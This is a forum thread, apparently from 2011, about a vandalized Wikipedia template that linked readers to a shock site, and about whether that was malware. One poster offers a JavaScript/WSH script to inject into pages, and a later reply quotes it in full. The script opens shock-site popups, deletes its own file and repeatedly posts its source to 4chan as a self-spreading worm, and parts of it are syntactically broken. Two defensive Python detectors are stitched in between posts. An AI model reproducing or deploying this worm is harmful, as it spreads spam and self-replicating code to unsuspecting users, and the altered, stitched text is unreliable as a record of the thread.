Full Version: Uh oh - malware infection from WP?
carbuncle
There is a report on the admin noticeboard that certain pages were causing malware infections. Some quotes:
QUOTE
:IF YOU CLICKED ON THE VANDALIZED PAGE. If you have, especially if you are running Idiotically Exploding and your AV software did not go crazy, I strongly suggest you kill your browser sessions and do a full scan of your computer. I tried right clicking for source... then left clicking to get focus... and before I could right click again, my AV software got very upset.
QUOTE
It's very disturbing that someone managed to mount that kind of attack. I can live with the NSFW pictures popping unexpectedly around here, but malware injection?? FuFoFuEd (talk) 03:38, 21 August 2011 (UTC)
QUOTE
I believe the malware site was under the domain feenode.net (the homepage is a shock site with gruesome images and audio—don't go there!), which is apparently owned by GNAA (see [33] archive) Would an admin add this domain to the edit filter or the spam blacklist? Thanks, Goodvac (talk) 05:03, 21 August 2011 (UTC)
QUOTE
I used Firefox 5, did not click on anything in that page, but still got infected with something that moves my browser window randomly around and fills it with some gory pic. It's fine for a while after I kill the process but then starts again. Avira can't find anything. Any suggestions? FuFoFuEd (talk) 06:10, 21 August 2011 (UTC)

While there is no real evidence that this was done by the GNAA, it seems that a GNAA-owned page is involved, and some members recently got blocked on WP. The page/template involved has been revdeleted and there isn't much detail in the report, but if someone has found a way to actually infect WP readers' computers, that might put a bit of a dent in WP's hit count.

SB_Johnny
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
Jon Awbrey
Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
Detective
QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *

I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).



QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *

Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif

I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)
Zoloft
QUOTE(Detective @ Sun 21st August 2011, 2:23pm) *
QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *
I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *
Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)

No two people are in complete agreement.

Jon is just ensuring that SBJ never gets his hands on delicious Kix cereal.

Some humans are malware. GNAA is a convenient collection of such people.
Milton Roe
QUOTE(Zoloft @ Sun 21st August 2011, 2:38pm) *

Some humans are malware. GNAA is a convenient collection of such people.

Randolph Churchill, son of the Prime Minister and a rather nasty alcoholic, once upon a time developed a colon tumor which had to be removed. It proved not to be cancer. Some wag said "What a shame to cut out of Randolph the only part that is NOT malignant...." dry.gif
melloden
The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
SB_Johnny
QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

Actually it wasn't Meepsheep, it was an edit to a widely used and unprotected template by a throwaway account.

Looking at the code, it looks like trying to click on any link from the article would have landed on the GNAA page. I doubt this will be anything near the last time someone employs the trick, and done to scale it could seriously mess up Wikipedia for a while.

Maybe that "image filter" will need to be reset to use whitelists rather than blacklist categories... unsure.gif
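The trick melloden and SB_Johnny describe above (an external link stretched over the whole viewport behind a transparent image, so that any click on the article lands on the attacker's site) is something a site can look for in the rendered HTML of a template edit. The following is an added example, written for this thread and not code from MediaWiki or from anyone in the discussion; it walks the HTML with the standard-library parser and flags anchors to external hosts whose inline styling makes them cover the page. The trusted host list, the size thresholds and the sample HTML are all assumptions constructed for the example.

```python
"""Flag full-viewport external link overlays in rendered wiki HTML.

Added example, not MediaWiki code. Heuristic: an <a> pointing off-site
is suspicious when it, or something inside it, is absolutely/fixed
positioned and sized to cover the page; a zero-opacity element inside
makes it the 'transparent image' pattern described in the thread.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the wiki's own hosts; links to anything else count as external.
TRUSTED_HOSTS = ("wikipedia.org", "wikimedia.org")


def _is_external(href):
    host = (urlparse(href).hostname or "").lower()
    return bool(host) and not any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def _norm(style):
    # Lower-case and strip spaces so the regexes below stay simple.
    return (style or "").lower().replace(" ", "")


def _positioned(style):
    return re.search(r"position:(absolute|fixed)", style) is not None


def _big(style, attrs):
    # 100%/100vw/100vh or a multi-thousand-pixel dimension (threshold is an assumption).
    if re.search(r"(width|height):(100(%|vw|vh)|\d{4,}px)", style):
        return True
    return any(str(attrs.get(k, "")).isdigit() and int(attrs[k]) >= 1000 for k in ("width", "height"))


def _invisible(style):
    return re.search(r"opacity:0(\.0+)?(;|$)", style) is not None or "visibility:hidden" in style


class OverlayFinder(HTMLParser):
    """Tracks open <a> elements and accumulates layout hints from their contents."""

    def __init__(self):
        super().__init__()
        self._open = []       # stack of anchors currently open
        self.findings = []    # one dict per suspicious anchor

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = _norm(a.get("style"))
        if tag == "a":
            self._open.append({"href": a.get("href") or "", "positioned": False,
                               "big": False, "invisible": False})
        # The anchor itself and every descendant contribute to the verdict.
        for anchor in self._open:
            anchor["positioned"] |= _positioned(style)
            anchor["big"] |= _big(style, a)
            anchor["invisible"] |= _invisible(style)

    def handle_endtag(self, tag):
        if tag == "a" and self._open:
            anchor = self._open.pop()
            if _is_external(anchor["href"]) and anchor["positioned"] and anchor["big"]:
                self.findings.append({"href": anchor["href"], "invisible": anchor["invisible"]})


def find_overlays(html):
    """Return the list of external anchors that appear to cover the viewport."""
    p = OverlayFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: one ordinary template link, one on-site banner that
# legitimately spans the page, and one off-site overlay of the kind discussed.
SAMPLE_HTML = """
<div class="navbox">
  <a href="https://en.wikipedia.org/wiki/Template:Foo">Template link</a>
  <a href="/wiki/Wikipedia:Site_notice" style="position:fixed;top:0;width:100%">notice</a>
  <a href="http://shock.example/" style="position:fixed;top:0;left:0;width:100%;height:100%">
    <img src="blank.png" style="opacity:0;width:100%;height:100%">
  </a>
</div>
"""

if __name__ == "__main__":
    for f in find_overlays(SAMPLE_HTML):
        print("overlay link to", f["href"], "(transparent)" if f["invisible"] else "")
```

Run as a script it prints the single off-site overlay; the on-site banner is ignored because only the link target, not the styling alone, makes it a problem. A real deployment would feed this the parser output of the edit preview (or of every page that transcludes the template) rather than raw wikitext, since the overlay only exists once the template is rendered.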
Michaeldsuarez
QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.


http://encyclopediadramatica.ch/Last_Measure
Meepsheep
So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
Mr.Treason II
QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>
Meepsheep
QUOTE(Mr.Treason II @ Tue 27th September 2011, 6:42pm) *

QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>



Oh god, 4chan.js, takes me back man
Kelly Martin
QUOTE(SB_Johnny @ Sun 21st August 2011, 11:27am) *
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
No, not the first time. There's been about a half-dozen instances of people using Wikipedia (or Wikimedia Commons) to spread malware that I've heard of. There are some phenomenally stupid security holes in IE that, to be honest, Tim Starling and Brion Vibber have bent over backwards to secure MediaWiki against. MediaWiki now has some fairly sophisticated code in it to screen uploaded files for malicious content; that code is there to block exploits that actually happened on Wikipedia or on Commons. Even so, there are doubtless still infected files in Commons; I'd not be surprised if a good portion of the porn there carries malware payloads, especially anything uploaded prior to mid-2007.
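Kelly Martin's post above refers to the upload screening MediaWiki added after real incidents: a browser that sniffs content (old IE in particular) will happily treat an "image" that starts with HTML as a web page and run whatever script it contains. The block below is an added example of that class of check, written for this thread and not taken from MediaWiki itself. It verifies that the file's leading bytes match the claimed extension and that no HTML or script marker appears in the window a sniffing browser might inspect. The allowed-type table, the 1 KiB window and the sample files are assumptions constructed for the example.

```python
"""Screen an upload for type mismatch and embedded active content.

Added example, not MediaWiki's own code. Two checks in the spirit of
the screening Kelly Martin describes:
  1. the magic bytes must match the extension the uploader claims;
  2. the leading bytes must not contain HTML/script markers that a
     content-sniffing browser could decide to execute.
"""

# Assumption: the set of permitted image types and their signatures.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Assumption: how far into the file a sniffing browser is assumed to look.
SNIFF_WINDOW = 1024

# Markers that indicate markup or script rather than image data.
MARKERS = (b"<script", b"<html", b"<head", b"<body", b"<iframe", b"<object",
           b"<embed", b"<!doctype html", b"javascript:", b"vbscript:", b"<?php")


def screen_upload(filename, data):
    """Return a list of problems; an empty list means the file passed."""
    problems = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        problems.append(f"extension '{ext}' not allowed")
    elif not any(data.startswith(sig) for sig in ALLOWED[ext]):
        problems.append(f"magic bytes do not match .{ext}")
    # Case-insensitive search over the sniffing window only.
    head = data[:SNIFF_WINDOW].lower()
    for m in MARKERS:
        if m in head:
            problems.append(f"active-content marker {m.decode()!r} in leading bytes")
    return problems


# Constructed samples (stubs, not real images).
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
HTML_AS_PNG = b"<html><body><script>alert(1)</script></body></html>"
GIF_WITH_SCRIPT = b"GIF89a" + b"\x01\x00\x01\x00" + b"<SCRIPT>x()</SCRIPT>"
EXE_AS_JPG = b"MZ\x90\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in (("ok.png", CLEAN_PNG), ("page.png", HTML_AS_PNG),
                       ("anim.gif", GIF_WITH_SCRIPT), ("photo.jpg", EXE_AS_JPG),
                       ("run.exe", EXE_AS_JPG)):
        verdict = screen_upload(name, blob)
        print(name, "->", "accepted" if not verdict else "; ".join(verdict))
```

The GIF case is the important one: its signature is correct, so a magic-bytes check alone accepts it, and only the marker scan catches the script that follows the header. Rejecting on either check is deliberate; a file that fails only the second can still be served as text/html by a browser that ignores the declared Content-Type.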